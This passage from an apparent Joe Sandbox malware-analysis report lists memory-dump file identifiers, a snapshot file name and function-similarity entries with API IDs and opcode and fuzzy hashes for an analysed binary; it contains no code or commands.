                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _strrchr
                                                  • String ID:
                                                  • API String ID: 3213747228-0
                                                  • Opcode ID: 254d999fa369d06fd7d93151cbf4a8417e2da6d6341328512c40b930a69fa730
                                                  • Instruction ID: 444d82082ea2503661b1ed52a5448b01db6e74fd2e3d18b62d1adce693f1c4d7
                                                  • Opcode Fuzzy Hash: 254d999fa369d06fd7d93151cbf4a8417e2da6d6341328512c40b930a69fa730
                                                  • Instruction Fuzzy Hash: 74B10332E246459FDF25CF28C881BAEBFE5EF45340F18916AE855EB242D6349D41CB70
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Xtime_diff_to_millis2_xtime_get
                                                  • String ID:
                                                  • API String ID: 531285432-0
                                                  • Opcode ID: 0e689964c9e6285ff400b608967780fc3dee30c8eb716f8b45005cb9cc5f5874
                                                  • Instruction ID: a47c6ff874f9ac8000b9ab7a0e2037555ae8543d3b4a5f8cdfa743337108be1b
                                                  • Opcode Fuzzy Hash: 0e689964c9e6285ff400b608967780fc3dee30c8eb716f8b45005cb9cc5f5874
                                                  • Instruction Fuzzy Hash: 64213571911219AFDF01EFA4DC829BEB7B9EF08710F50901AF905B7261EB309D419BB0